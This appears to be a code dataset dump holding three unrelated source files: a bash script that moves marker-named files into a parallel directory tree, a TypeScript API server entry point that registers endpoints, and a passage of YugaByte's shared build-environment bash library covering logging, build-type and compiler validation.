text stringlengths 1 1.05M |
|---|
#!/bin/bash
# mvdir.sh : Move files containing a marker string into a parallel directory
# tree, stripping the marker from each file name.
# Author : Kiyoon Kim (yoonkr33@gmail.com)
# Usage : mvdir.sh [input_dir] [output_dir] [containing_string]
# Warning : [containing_string] should be unique!!
# Example : mvdir.sh /home/music /home/music_converted __converted__
# then move /home/music/folder/sample__converted__.mp3 -> /home/music_converted/folder/sample.mp3
if [ $# -lt 3 ]
then
echo "# mvdir.sh : Move files containing a marker string into a parallel directory tree,
# stripping the marker from each file name.
# Author : Kiyoon Kim (yoonkr33@gmail.com)
# Usage : mvdir.sh [input_dir] [output_dir] [containing_string]
# Warning : [containing_string] should be unique!!
# Example : mvdir.sh /home/music /home/music_converted __converted__
# then move /home/music/folder/sample__converted__.mp3 -> /home/music_converted/folder/sample.mp3"
exit 1
fi
# IFS= read -r preserves leading whitespace and backslashes in file names.
find "$1" -name "*$3*" | while IFS= read -r file
do
    # Bash parameter expansion instead of sed: the original sed commands broke
    # whenever $1/$2/$3 contained '/' or regex metacharacters (paths always
    # contain '/'). Quoting the pattern disables glob interpretation.
    new_file=${file/"$1"/"$2"}
    new_file=${new_file//"$3"/}
    # dirname replaces the external getdir.sh helper (same result, no extra
    # script dependency).
    dir=$(dirname "$new_file")
    mkdir -p "$dir"
    mv -v "$file" "$new_file"
done
|
<reponame>belugafm/beluga-v3-api-server
import { AuthenticityTokenQueryRepository, LoginSessionQueryRepository, UserQueryRepository } from "./web/repositories"
import { Request, Response, TurboServer } from "./web/turbo"
import { Authenticator } from "./web/auth"
import { CookieAuthenticationApplication } from "./application/authentication/Cookie"
import { UserCommandRepository } from "./infrastructure/prisma/repository/command/User"
import config from "./config/app"
async function startServer() {
    // Fallback handler: any route not registered below answers 404 with a
    // JSON error payload.
    const notFoundHandler = (req: Request, res: Response) => {
        res.setHeader("Content-Type", "application/json")
        res.setStatusCode(404)
        const body = JSON.stringify({
            ok: false,
            error: "endpoint_not_found",
        })
        res.write(Buffer.from(body))
        res.end()
    }
    const server = new TurboServer(
        {
            maxParamLength: 128,
            defaultRoute: notFoundHandler,
        },
        new UserCommandRepository(),
        new Authenticator(
            new CookieAuthenticationApplication(
                new UserQueryRepository(),
                new LoginSessionQueryRepository(),
                new AuthenticityTokenQueryRepository()
            )
        )
    )
    // Register every endpoint module with the router (registration order is
    // preserved — identical to the previous one-call-per-line form).
    console.log("Register endpoints")
    const endpointModules = [
        "account/signup",
        "account/signin",
        "auth/cookie/authenticate",
        "auth/twitter/request_token",
        "auth/twitter/authenticate",
        "channel_group/create",
        "channel_group/show",
        "channel_group/list_channels",
        "channel_group/list_channel_groups",
        "channel/create",
        "channel/show",
        "channel/list_channels",
        "message/post",
        "message/delete",
        "timeline/channel",
        "timeline/channel_group",
        "upload/media",
        // "debug",
    ]
    for (const name of endpointModules) {
        server.register(require(`./web/endpoint/${name}`))
    }
    server.listen(config.server.port)
}
// Boot the server. The original used console.group here, which opens a log
// group that is never closed (indenting all subsequent output) — console.log
// is almost certainly what was intended. On failure we log the error and set
// the process exit code so supervisors notice the failed start without
// forcibly killing in-flight work.
startServer()
    .then(() => {
        console.log("Server running")
    })
    .catch((error) => {
        console.error(error)
        process.exitCode = 1
    })
|
#@IgnoreInspection BashAddShebang
# Copyright (c) YugaByte, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License
# is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing permissions and limitations
# under the License.
#
# This is common between build and test scripts.
# Strict mode: exit on error, error on unset variables, propagate pipeline
# failures.
set -euo pipefail
# This library must be sourced (so its functions and variables land in the
# calling shell), never executed as a standalone script.
if [[ $BASH_SOURCE == $0 ]]; then
  echo "$BASH_SOURCE must be sourced, not executed" >&2
  exit 1
fi
# Guard against multiple inclusions.
if [[ -n ${YB_COMMON_BUILD_ENV_SOURCED:-} ]]; then
  # Return to the executing script.
  return
fi
YB_COMMON_BUILD_ENV_SOURCED=1
declare -i MAX_JAVA_BUILD_ATTEMPTS=5
# What matches these expressions will be filtered out of Maven output.
MVN_OUTPUT_FILTER_REGEX='\[INFO\] (Download(ing|ed): '
MVN_OUTPUT_FILTER_REGEX+='|[^ ]+ already added, skipping$)'
MVN_OUTPUT_FILTER_REGEX+='|^Generating .*[.]html[.][.][.]$'
MVN_OUTPUT_FILTER_REGEX+='|^\[INFO\] Copying .*[.]jar to .*[.]jar$'
readonly YB_JENKINS_NFS_HOME_DIR=/n/jenkins
# In our NFS environment, we keep Linuxbrew builds in this directory.
readonly SHARED_LINUXBREW_BUILDS_DIR="$YB_JENKINS_NFS_HOME_DIR/linuxbrew"
# We look for the list of distributed build worker nodes in this file. This gets populated by
# a cronjob on buildmaster running under the jenkins user (as of 06/20/2017).
readonly YB_BUILD_WORKERS_FILE=$YB_JENKINS_NFS_HOME_DIR/run/build-workers
# The assumed number of cores per build worker. This is used in the default make parallelism level
# calculation in yb_build.sh. This does not have to be the exact number of cores per worker, but
# will affect whether or not we force the auto-scaling group of workers to expand.
readonly YB_NUM_CORES_PER_BUILD_WORKER=8
# The "number of build workers" that we'll end up using to compute the parallelism (by multiplying
# it by YB_NUM_CORES_PER_BUILD_WORKER) will be first brought into this range.
readonly MIN_EFFECTIVE_NUM_BUILD_WORKERS=5
readonly MAX_EFFECTIVE_NUM_BUILD_WORKERS=10
# Frozen only now, after all += appends above are complete.
readonly MVN_OUTPUT_FILTER_REGEX
# An even faster alternative to downloading a pre-built third-party dependency tarball from S3
# or Google Storage: just use a pre-existing third-party build from NFS. This has to be maintained
# outside of main (non-thirdparty) YB codebase's build pipeline.
readonly NFS_PARENT_DIR_FOR_SHARED_THIRDPARTY=/n/jenkins/thirdparty
# This node is the NFS server and is also used to run the non-distributed part of distributed builds
# (e.g. "cmake" or "make" commands) in a way such that it would have access to the build directory
# as a local filesystem.
#
# This must be something that could be compared with $HOSTNAME, i.e. this can't be
# "buildmaster.c.yugabyte.internal", only "buildmaster".
readonly DISTRIBUTED_BUILD_MASTER_HOST=buildmaster
# We create a Python Virtual Environment inside this directory in the build directory.
readonly YB_VIRTUALENV_BASENAME=python_virtual_env
# -------------------------------------------------------------------------------------------------
# Functions used in initializing some constants
# -------------------------------------------------------------------------------------------------
print_stack_trace() {
  # Dump the bash call stack to stderr, one "file:line function" frame per
  # line. Optional first argument: index of the first frame to print
  # (defaults to 1, i.e. skip this function's own frame).
  local -i start=${1:-1}
  local -i frame
  echo "Stack trace:" >&2
  for (( frame = start; frame < ${#FUNCNAME[@]}; frame++ )); do
    echo " ${BASH_SOURCE[$frame]}:${BASH_LINENO[$((frame - 1))]} ${FUNCNAME[$frame]}" >&2
  done
}
fatal() {
  # Log an error message (with the standard log prefix) plus a stack trace,
  # then terminate the script with exit code 1. Setting yb_fatal_quiet
  # suppresses both the message and the trace.
  if [[ -n "${yb_fatal_quiet:-}" ]]; then
    yb_log_quiet=$yb_fatal_quiet
  else
    yb_log_quiet=false
  fi
  # Attribute the log line to fatal's caller rather than to fatal itself.
  yb_log_skip_top_frames=1
  log "$@"
  # yb_log_quiet holds "true"/"false", executed as a command here.
  if ! "$yb_log_quiet"; then
    print_stack_trace 2 # Exclude this line itself from the stack trace (start from 2nd line).
  fi
  exit 1
}
get_timestamp() {
  # Current wall-clock time in ISO-8601-like form, used for log prefixes.
  local format='+%Y-%m-%dT%H:%M:%S'
  date "$format"
}
get_timestamp_for_filenames() {
  # Same timestamp as get_timestamp but with underscores instead of colons,
  # so the result is safe to embed in file names.
  local format='+%Y-%m-%dT%H_%M_%S'
  date "$format"
}
log_empty_line() {
  # Emit a single blank line to stderr (visual spacing between log sections).
  printf '\n' >&2
}
log_separator() {
  # Print a dashed separator line to stderr, padded with blank lines.
  log_empty_line
  echo >&2 "--------------------------------------------------------------------------------------"
  log_empty_line
}
heading() {
  # Print "$1" to stderr framed by dashed separator lines and blank lines.
  log_empty_line
  echo >&2 "--------------------------------------------------------------------------------------"
  echo >&2 "$1"
  echo >&2 "--------------------------------------------------------------------------------------"
  log_empty_line
}
log() {
  # Log "$@" to stderr with a "[timestamp file:line function]" prefix, unless
  # yb_log_quiet is "true". yb_log_skip_top_frames lets wrappers (e.g. fatal)
  # attribute the message to their own caller.
  if [[ "${yb_log_quiet:-}" != "true" ]]; then
    # Weirdly, when we put $* inside double quotes, that has an effect of making the following log
    # statement produce multi-line output:
    #
    #   log "Some long log statement" \
    #       "continued on the other line."
    #
    # We want that to produce a single line the same way the echo command would. Putting $* by
    # itself achieves that effect. That has a side effect of passing echo-specific arguments
    # (e.g. -n or -e) directly to the final echo command.
    #
    # On why the index for BASH_LINENO is one lower than that for BASH_SOURCE and FUNCNAME:
    # This is different from what the manual says at
    # https://www.gnu.org/software/bash/manual/html_node/Bash-Variables.html:
    #
    #   An array variable whose members are the line numbers in source files where each
    #   corresponding member of FUNCNAME was invoked. ${BASH_LINENO[$i]} is the line number in the
    #   source file (${BASH_SOURCE[$i+1]}) where ${FUNCNAME[$i]} was called (or ${BASH_LINENO[$i-1]}
    #   if referenced within another shell function). Use LINENO to obtain the current line number.
    #
    # Our experience is that FUNCNAME indexes exactly match those of BASH_SOURCE.
    local stack_idx0=${yb_log_skip_top_frames:-0}
    local stack_idx1=$(( $stack_idx0 + 1 ))
    echo "[$( get_timestamp )" \
         "${BASH_SOURCE[$stack_idx1]##*/}:${BASH_LINENO[$stack_idx0]}" \
         "${FUNCNAME[$stack_idx1]}]" $* >&2
  fi
}
log_with_color() {
  # log() wrapper: the first argument is an ANSI color escape prepended to
  # the message; NO_COLOR resets the terminal color at the end.
  local log_color=$1
  shift
  log "$log_color$*$NO_COLOR"
}
horizontal_line() {
  # Fixed-width single-dash separator line, printed to stdout.
  printf '%s\n' \
    "------------------------------------------------------------------------------------------"
}
thick_horizontal_line() {
  # Fixed-width double-thickness ('=') separator line, printed to stdout.
  printf '%s\n' \
    "=========================================================================================="
}
header() {
  # Print "$@" to stdout framed by blank lines and horizontal rules.
  echo
  horizontal_line
  echo "$@"
  horizontal_line
  echo
}
# Usage: expect_some_args "$@"
# Fatals if there are no arguments.
expect_some_args() {
  # FUNCNAME[1] is the function that called us — used in the error message.
  local calling_func_name=${FUNCNAME[1]}
  if [[ $# -eq 0 ]]; then
    fatal "$calling_func_name expects at least one argument"
  fi
}
# Make a regular expression from a list of possible values. This function takes any non-zero number
# of arguments, but each argument is further broken down into components separated by whitespace,
# and those components are treated as separate possible values. Empty values are ignored.
make_regex_from_list() {
  # $1 names an array variable. Produces (via eval, in the caller's scope):
  #   <name>_RE     - anchored alternation:   ^(a|b|...)$
  #   <name>_RAW_RE - unanchored alternation: a|b|...
  local list_var_name=$1
  expect_some_args "$@"
  local regex=""
  # "name[@]" with ${!...} expands all elements of the named array.
  local list_var_name_full="$list_var_name[@]"
  for item in "${!list_var_name_full}"; do
    if [[ -z $item ]]; then
      continue
    fi
    if [[ -n $regex ]]; then
      regex+="|"
    fi
    regex+="$item"
  done
  eval "${list_var_name}_RE=\"^($regex)$\""
  eval "${list_var_name}_RAW_RE=\"$regex\""
}
make_regexes_from_lists() {
  # Run make_regex_from_list for each array name passed as an argument.
  local list_var_name
  for list_var_name in "$@"; do
    make_regex_from_list "$list_var_name"
  done
}
# -------------------------------------------------------------------------------------------------
# Constants
# -------------------------------------------------------------------------------------------------
readonly VALID_BUILD_TYPES=(
  asan
  debug
  fastdebug
  idebug
  irelease
  ifastdebug
  profile_build
  profile_gen
  release
  tsan
  tsan_slow
)
# Valid values of CMAKE_BUILD_TYPE passed to the top-level CMake build. This is the same as the
# above with the exclusion of ASAN/TSAN.
readonly VALID_CMAKE_BUILD_TYPES=(
  debug
  fastdebug
  profile_build
  profile_gen
  release
)
readonly VALID_COMPILER_TYPES=( gcc clang zapcc )
readonly VALID_LINKING_TYPES=( static dynamic )
readonly VALID_EDITIONS=( community enterprise )
# Defines <LIST>_RE (anchored) and <LIST>_RAW_RE (unanchored) regex variables
# for each of the lists above.
make_regexes_from_lists \
  VALID_BUILD_TYPES \
  VALID_CMAKE_BUILD_TYPES \
  VALID_COMPILER_TYPES \
  VALID_LINKING_TYPES \
  VALID_EDITIONS
# Matches a valid BUILD_ROOT basename, e.g. "release-gcc-dynamic-community-ninja".
# The backslash-newline continuations must stay at column 0 so no whitespace
# leaks into the pattern.
readonly BUILD_ROOT_BASENAME_RE=\
"^($VALID_BUILD_TYPES_RAW_RE)-\
($VALID_COMPILER_TYPES_RAW_RE)-\
($VALID_LINKING_TYPES_RAW_RE)-\
($VALID_EDITIONS_RAW_RE)\
(-ninja)?$"
# ANSI terminal color escapes, stored literally and interpreted later by
# 'echo -e' / printf '%b'.
readonly YELLOW_COLOR="\033[0;33m"
readonly RED_COLOR="\033[0;31m"
readonly CYAN_COLOR="\033[0;36m"
readonly NO_COLOR="\033[0m"
# We first use this to find ephemeral drives.
readonly EPHEMERAL_DRIVES_GLOB="/mnt/ephemeral* /mnt/d*"
# We then filter the drives found using this.
# The way we use this regex we expect it NOT to be anchored in the end.
readonly EPHEMERAL_DRIVES_FILTER_REGEX="^/mnt/(ephemeral|d)[0-9]+" # No "$" in the end.
# http://stackoverflow.com/questions/5349718/how-can-i-repeat-a-character-in-bash
readonly HORIZONTAL_LINE=$( printf '=%.0s' {1..80} )
# -------------------------------------------------------------------------------------------------
# Functions
# -------------------------------------------------------------------------------------------------
yellow_color() {
  # Switch terminal text to yellow (no trailing newline; %b expands \033).
  printf '%b' "$YELLOW_COLOR"
}
red_color() {
  # Switch terminal text to red (no trailing newline; %b expands \033).
  printf '%b' "$RED_COLOR"
}
no_color() {
  # Reset terminal text color (no trailing newline; %b expands \033).
  printf '%b' "$NO_COLOR"
}
to_lowercase() {
  # stdin filter: translate ASCII A-Z to a-z (explicit A-Z/a-z ranges rather
  # than [:upper:]/[:lower:] keeps the behavior locale-independent).
  tr A-Z a-z
}
is_mac() {
  # Success when running on macOS (OSTYPE is e.g. "darwin16").
  [[ $OSTYPE == darwin* ]]
}
is_linux() {
  # Success when running on Linux (OSTYPE is e.g. "linux-gnu").
  [[ $OSTYPE == linux* ]]
}
expect_vars_to_be_set() {
  # Fatals unless every variable named in "$@" is set and non-empty in the
  # caller's environment.
  local calling_func_name=${FUNCNAME[1]}
  local var_name
  for var_name in "$@"; do
    # ${!var_name:-} — indirect expansion with a default, safe under set -u.
    if [[ -z ${!var_name:-} ]]; then
      # Use $* (not $@) inside the quoted string: "$@" expands to multiple
      # words here (SC2145); $* joins the names into one message argument.
      fatal "The '$var_name' variable must be set by the caller of $calling_func_name." \
            "$calling_func_name expects the following variables to be set: $*."
    fi
  done
}
# Validates the number of arguments passed to its caller. Should also be passed all the caller's
# arguments using "$@".
# Example:
#   expect_num_args 1 "$@"
expect_num_args() {
  expect_some_args "$@"
  # Our own first argument is the expected count; the remainder are the
  # caller's actual arguments.
  local caller_expected_num_args=$1
  local calling_func_name=${FUNCNAME[1]}
  shift
  if [[ $# -ne $caller_expected_num_args ]]; then
    yb_log_quiet=false
    local error_msg="$calling_func_name expects $caller_expected_num_args arguments, got $#."
    if [[ $# -eq 0 ]]; then
      error_msg+=" Check if \"\$@\" was included in the call to expect_num_args."
    fi
    if [[ $# -gt 0 ]]; then
      log "Logging actual arguments to '$calling_func_name' before a fatal error:"
      local arg
      for arg in "$@"; do
        log " - $arg"
      done
    fi
    fatal "$error_msg"
  fi
}
normalize_build_type() {
  # Validate the global build_type variable and lower-case it in place.
  validate_build_type "$build_type"
  local lowercase_build_type=$( echo "$build_type" | to_lowercase )
  if [[ "$build_type" != "$lowercase_build_type" ]]; then
    # Only assign if we actually need to, because the build_type variable may already be read-only.
    build_type=$lowercase_build_type
  fi
}
# Sets the build directory based on the given build type (the build_type variable) and the value of
# the YB_COMPILER_TYPE environment variable.
set_build_root() {
  # Optional flag --no-readonly: skip marking BUILD_ROOT readonly, for callers
  # that still need to adjust it afterwards.
  if [[ ${1:-} == "--no-readonly" ]]; then
    local -r make_build_root_readonly=false
    shift
  else
    local -r make_build_root_readonly=true
  fi
  expect_num_args 0 "$@"
  normalize_build_type
  readonly build_type
  validate_compiler_type "$YB_COMPILER_TYPE"
  determine_linking_type
  # BUILD_ROOT basename encodes build type, compiler, linking type, edition,
  # and optionally the ninja generator (cf. BUILD_ROOT_BASENAME_RE).
  BUILD_ROOT=$YB_BUILD_PARENT_DIR/$build_type-$YB_COMPILER_TYPE-$YB_LINK
  detect_edition
  BUILD_ROOT+="-$YB_EDITION"
  if using_ninja; then
    BUILD_ROOT+="-ninja"
  fi
  normalize_build_root
  if "$make_build_root_readonly"; then
    readonly BUILD_ROOT
  fi
  # Sanity check against a BUILD_ROOT that may have been fixed earlier
  # (e.g. from the command line or environment).
  if [[ -n ${predefined_build_root:-} && $predefined_build_root != $BUILD_ROOT ]]; then
    fatal "An inconsistency between predefined BUILD_ROOT ('$predefined_build_root') and" \
          "computed BUILD_ROOT ('$BUILD_ROOT')."
  fi
  export BUILD_ROOT
  export YB_BUILD_ROOT=$BUILD_ROOT
}
# Resolve the BUILD_ROOT symlink and save the result to the real_build_root_path variable.
set_real_build_root_path() {
  # Stores the absolute, physical path of BUILD_ROOT in the global read-only
  # variable real_build_root_path.
  if [[ -h $BUILD_ROOT ]]; then
    real_build_root_path=$( readlink "$BUILD_ROOT" )
  else
    real_build_root_path="$BUILD_ROOT"
  fi
  # Assign before marking readonly: 'readonly var=$(cmd)' masks cmd's exit
  # status (SC2155), so a failed 'cd' used to slip past 'set -e'.
  real_build_root_path=$( cd "$real_build_root_path" && pwd )
  readonly real_build_root_path
}
ensure_build_root_is_set() {
  # Fatals unless the BUILD_ROOT environment variable is set and non-empty.
  if [[ -z ${BUILD_ROOT:-} ]]; then
    fatal "The BUILD_ROOT environment variable is not set. This must point to the absolute path" \
          "of the build root directory, e.g. '<yugabyte_src_dir>/build/debug'."
  fi
}
ensure_directory_exists() {
  # Fatals unless $1 exists and is a directory.
  expect_num_args 1 "$@"
  local directory_path=$1
  if [[ ! -d $directory_path ]]; then
    fatal "Directory '$directory_path' does not exist or is not a directory"
  fi
}
ensure_file_exists() {
  # Fatals unless $1 exists and is a regular file.
  expect_num_args 1 "$@"
  local file_name=$1
  if [[ ! -f $file_name ]]; then
    fatal "File '$file_name' does not exist or is not a file"
  fi
}
ensure_build_root_exists() {
  # Fatals unless BUILD_ROOT is set AND points at an existing directory.
  ensure_build_root_is_set
  if [[ ! -d $BUILD_ROOT ]]; then
    fatal "The directory BUILD_ROOT ('$BUILD_ROOT') does not exist"
  fi
}
normalize_build_root() {
  # Canonicalize BUILD_ROOT to an absolute path — but only if the directory
  # already exists (cd would fail otherwise).
  ensure_build_root_is_set
  if [[ -d $BUILD_ROOT ]]; then
    BUILD_ROOT=$( cd "$BUILD_ROOT" && pwd )
  fi
}
determine_linking_type() {
  # Default YB_LINK to "dynamic", validate it against VALID_LINKING_TYPES_RE,
  # then export and freeze it.
  if [[ -z "${YB_LINK:-}" ]]; then
    YB_LINK=dynamic
  fi
  if [[ ! "${YB_LINK:-}" =~ ^$VALID_LINKING_TYPES_RE$ ]]; then
    fatal "Expected YB_LINK to be set to \"static\" or \"dynamic\", got \"${YB_LINK:-}\""
  fi
  export YB_LINK
  readonly YB_LINK
}
validate_build_type() {
  # Fatals unless $1 is one of VALID_BUILD_TYPES (case-insensitive).
  expect_num_args 1 "$@"
  # Local variable named _build_type to avoid a collision with the global build_type variable.
  local _build_type=$1
  if ! is_valid_build_type "$_build_type"; then
    fatal "Invalid build type: '$_build_type'. Valid build types are: ${VALID_BUILD_TYPES[@]}" \
          "(case-insensitive)."
  fi
}
is_valid_build_type() {
  # Success iff $1 (lower-cased) matches the anchored VALID_BUILD_TYPES_RE.
  expect_num_args 1 "$@"
  local -r _build_type=$( echo "$1" | to_lowercase )
  [[ "$_build_type" =~ $VALID_BUILD_TYPES_RE ]]
}
set_build_type_based_on_jenkins_job_name() {
  # Derive the global build_type from the Jenkins JOB_NAME (first valid build
  # type embedded in the job name, delimited by '-' or '_'), defaulting to
  # "debug". The variable is frozen (readonly) in every branch.
  if [[ -n "${build_type:-}" ]]; then
    if [[ -n "${JOB_NAME:-}" ]]; then
      # This message only makes sense if JOB_NAME is set.
      log "Build type is already set to '$build_type', not setting it based on Jenkins job name."
    fi
    normalize_build_type
    readonly build_type
    return
  fi
  build_type=debug
  if [[ -z "${JOB_NAME:-}" ]]; then
    log "Using build type '$build_type' by default because JOB_NAME is not set."
    readonly build_type
    return
  fi
  local _build_type  # to avoid collision with the global build_type variable
  local jenkins_job_name=$( echo "$JOB_NAME" | to_lowercase )
  for _build_type in "${VALID_BUILD_TYPES[@]}"; do
    # Surrounding '-' lets the delimiter class match at the very start/end of
    # the job name as well.
    if [[ "-$jenkins_job_name-" =~ [-_]$_build_type[-_] ]]; then
      log "Using build type '$_build_type' based on Jenkins job name '$JOB_NAME'."
      readonly build_type=$_build_type
      return
    fi
  done
  readonly build_type
  log "Using build type '$build_type' by default: could not determine from Jenkins job name" \
      "'$JOB_NAME'."
}
set_default_compiler_type() {
  # Pick a default compiler when the caller has not specified one:
  # clang on macOS, gcc everywhere else. No-op if YB_COMPILER_TYPE is set.
  if [[ -n "${YB_COMPILER_TYPE:-}" ]]; then
    return
  fi
  case "$OSTYPE" in
    darwin*) YB_COMPILER_TYPE=clang ;;
    *)       YB_COMPILER_TYPE=gcc ;;
  esac
  export YB_COMPILER_TYPE
  readonly YB_COMPILER_TYPE
}
is_clang() {
  # Success iff the selected compiler type is clang. The [[ ]] test's own
  # status is the return value — no explicit return 0/1 needed.
  [[ $YB_COMPILER_TYPE == "clang" ]]
}
is_gcc() {
  # Success iff the selected compiler type is gcc. The [[ ]] test's own
  # status is the return value — no explicit return 0/1 needed.
  [[ $YB_COMPILER_TYPE == "gcc" ]]
}
build_compiler_if_necessary() {
  # Sometimes we have to build the compiler before we can run CMake.
  # On Linux with clang selected, build LLVM via the third-party script.
  if is_clang && is_linux; then
    log "Building clang before we can run CMake with compiler pointing to clang"
    "$YB_THIRDPARTY_DIR/build_thirdparty.py" llvm
  fi
}
set_compiler_type_based_on_jenkins_job_name() {
  # Derive YB_COMPILER_TYPE from the Jenkins JOB_NAME (first valid compiler
  # type embedded in the job name, delimited by '-' or '_'). Leaves the
  # variable untouched if already set; validates, freezes and exports it.
  if [[ -n "${YB_COMPILER_TYPE:-}" ]]; then
    if [[ -n "${JOB_NAME:-}" ]]; then
      log "The YB_COMPILER_TYPE variable is already set to '${YB_COMPILER_TYPE}', not setting it" \
          "based on the Jenkins job name."
    fi
  else
    local compiler_type
    # NOTE(review): $JOB_NAME is expanded without a :- default here; under
    # 'set -u' this branch would fail if JOB_NAME is unset — confirm callers
    # always set it before reaching this path.
    local jenkins_job_name=$( echo "$JOB_NAME" | to_lowercase )
    YB_COMPILER_TYPE=""
    for compiler_type in "${VALID_COMPILER_TYPES[@]}"; do
      if [[ "-$jenkins_job_name-" =~ [-_]$compiler_type[-_] ]]; then
        log "Setting YB_COMPILER_TYPE='$compiler_type' based on Jenkins job name '$JOB_NAME'."
        YB_COMPILER_TYPE=$compiler_type
        break
      fi
    done
    if [[ -z "$YB_COMPILER_TYPE" ]]; then
      log "Could not determine compiler type from Jenkins job name '$JOB_NAME'," \
          "will use the default."
      return
    fi
  fi
  validate_compiler_type
  readonly YB_COMPILER_TYPE
  export YB_COMPILER_TYPE
}
validate_compiler_type() {
  # Fatals unless the compiler type (argument $1, or YB_COMPILER_TYPE when
  # called with no arguments) matches VALID_COMPILER_TYPES_RE.
  local compiler_type
  if [[ $# -eq 0 ]]; then
    if [[ -z ${YB_COMPILER_TYPE:-} ]]; then
      fatal "$FUNCNAME is called with no arguments but YB_COMPILER_TYPE is not set or is empty"
    fi
    compiler_type=$YB_COMPILER_TYPE
  elif [[ $# -eq 1 ]]; then
    compiler_type=$1
  else
    fatal "$FUNCNAME can only be called with 0 or 1 argument, got $# arguments: $*"
  fi
  if [[ ! $compiler_type =~ $VALID_COMPILER_TYPES_RE ]]; then
    fatal "Invalid compiler type: YB_COMPILER_TYPE='$compiler_type'" \
          "(expected one of: ${VALID_COMPILER_TYPES[@]})."
  fi
}
validate_cmake_build_type() {
  # Fatals unless $1 (lower-cased) is a valid CMAKE_BUILD_TYPE value
  # (VALID_CMAKE_BUILD_TYPES — excludes asan/tsan pseudo build types).
  expect_num_args 1 "$@"
  local _cmake_build_type=$1
  _cmake_build_type=$( echo "$_cmake_build_type" | tr A-Z a-z )
  if [[ ! "$_cmake_build_type" =~ $VALID_CMAKE_BUILD_TYPES_RE ]]; then
    fatal "Invalid CMake build type (what we're about to pass to our CMake build as" \
          "_cmake_build_type): '$_cmake_build_type'." \
          "Valid CMake build types are: ${VALID_CMAKE_BUILD_TYPES[@]}."
  fi
}
ensure_using_clang() {
  # Force YB_COMPILER_TYPE to clang (required for ASAN/TSAN builds); fatals
  # if a different compiler type was already chosen.
  if [[ -n ${YB_COMPILER_TYPE:-} && $YB_COMPILER_TYPE != "clang" ]]; then
    fatal "ASAN/TSAN builds require clang," \
          "but YB_COMPILER_TYPE is already set to '$YB_COMPILER_TYPE'"
  fi
  YB_COMPILER_TYPE="clang"
}
enable_tsan() {
  # Add the ThreadSanitizer CMake flag (appends to the caller's cmake_opts
  # array) and make sure clang is the compiler.
  cmake_opts+=( -DYB_USE_TSAN=1 )
  ensure_using_clang
}
# This performs two configuration actions:
# - Sets cmake_build_type based on build_type. cmake_build_type is what's being passed to CMake
#   using the CMAKE_BUILD_TYPE variable. CMAKE_BUILD_TYPE can't be "asan" or "tsan".
# - Ensure the YB_COMPILER_TYPE environment variable is set. It is used by our compiler-wrapper.sh
#   script to invoke the appropriate C/C++ compiler.
set_cmake_build_type_and_compiler_type() {
  if [[ -z "${cmake_opts:-}" ]]; then
    cmake_opts=()
  fi
  if [[ -z ${build_type:-} ]]; then
    log "Setting build type to 'debug' by default"
    build_type=debug
  fi
  normalize_build_type
  # We're relying on build_type to set more variables, so make sure it does not change later.
  readonly build_type
  # Map the user-facing build type onto the CMAKE_BUILD_TYPE value plus any
  # sanitizer/instrumentation CMake flags.
  case "$build_type" in
    asan)
      cmake_opts+=( -DYB_USE_ASAN=1 -DYB_USE_UBSAN=1 )
      cmake_build_type=fastdebug
      ensure_using_clang
    ;;
    tsan)
      enable_tsan
      cmake_build_type=fastdebug
    ;;
    tsan_slow)
      enable_tsan
      cmake_build_type=debug
    ;;
    idebug|irelease|ifastdebug)
      # "i" prefix = instrumented build; strip the prefix for CMake.
      cmake_build_type=${build_type:1}
      cmake_opts+=( -DYB_INSTRUMENT_FUNCTIONS=1 )
    ;;
    *)
      cmake_build_type=$build_type
  esac
  validate_cmake_build_type "$cmake_build_type"
  readonly cmake_build_type
  # Compiler selection: clang is mandatory on macOS, gcc is the Linux default.
  if is_mac; then
    if [[ -z ${YB_COMPILER_TYPE:-} ]]; then
      YB_COMPILER_TYPE=clang
    elif [[ $YB_COMPILER_TYPE != "clang" ]]; then
      fatal "YB_COMPILER_TYPE can only be 'clang' on Mac OS X," \
            "found YB_COMPILER_TYPE=$YB_COMPILER_TYPE."
    fi
  elif [[ -z ${YB_COMPILER_TYPE:-} ]]; then
    # The default on Linux.
    YB_COMPILER_TYPE=gcc
  fi
  validate_compiler_type
  readonly YB_COMPILER_TYPE
  export YB_COMPILER_TYPE
  # We need to set CMAKE_C_COMPILER and CMAKE_CXX_COMPILER outside of CMake. We used to do that from
  # CMakeLists.txt, and got into an infinite loop where CMake kept saying:
  #
  #   You have changed variables that require your cache to be deleted.
  #   Configure will be re-run and you may have to reset some variables.
  #   The following variables have changed:
  #   CMAKE_CXX_COMPILER= /usr/bin/c++
  #
  # Not sure why it printed the old value there, since we tried to assign it the new value, the
  # same as what's given below.
  #
  # So our new approach is to pass the correct command-line options to CMake, and still let CMake
  # use the default compiler in CLion-triggered builds.
  cmake_opts+=( "-DCMAKE_BUILD_TYPE=$cmake_build_type" )
  cmake_opts+=( "${YB_DEFAULT_CMAKE_OPTS[@]}" )
  # Generator selection: Ninja when requested, falling back through Linuxbrew
  # or a Homebrew auto-install when the binary is missing.
  if using_ninja; then
    cmake_opts+=( -G Ninja )
    make_program=ninja
    if ! which ninja &>/dev/null; then
      if using_linuxbrew; then
        make_program=$YB_LINUXBREW_DIR/bin/ninja
      elif is_mac; then
        log "Did not find the 'ninja' executable, auto-installing ninja using Homebrew"
        brew install ninja
      fi
    fi
    make_file=build.ninja
  else
    make_program=make
    make_file=Makefile
  fi
  cmake_opts+=( -DCMAKE_MAKE_PROGRAM=$make_program )
}
set_mvn_parameters() {
  # Compute and export Maven configuration: the local repository path,
  # the settings.xml path, and the mvn_common_options array shared by the
  # Java build functions. Jenkins builds with the source on NFS use shared
  # NFS locations instead of ~/.m2.
  if [[ -z ${YB_MVN_LOCAL_REPO:-} ]]; then
    if is_jenkins && is_src_root_on_nfs; then
      YB_MVN_LOCAL_REPO=/n/jenkins/m2_repository
    else
      YB_MVN_LOCAL_REPO=$HOME/.m2/repository
    fi
  fi
  export YB_MVN_LOCAL_REPO
  if [[ -z ${YB_MVN_SETTINGS_PATH:-} ]]; then
    if is_jenkins && is_src_root_on_nfs; then
      YB_MVN_SETTINGS_PATH=/n/jenkins/m2_settings.xml
    else
      YB_MVN_SETTINGS_PATH=$HOME/.m2/settings.xml
    fi
  fi
  # Bug fix: this previously exported MVN_SETTINGS_PATH — a variable that is
  # never assigned anywhere; the one computed above is YB_MVN_SETTINGS_PATH.
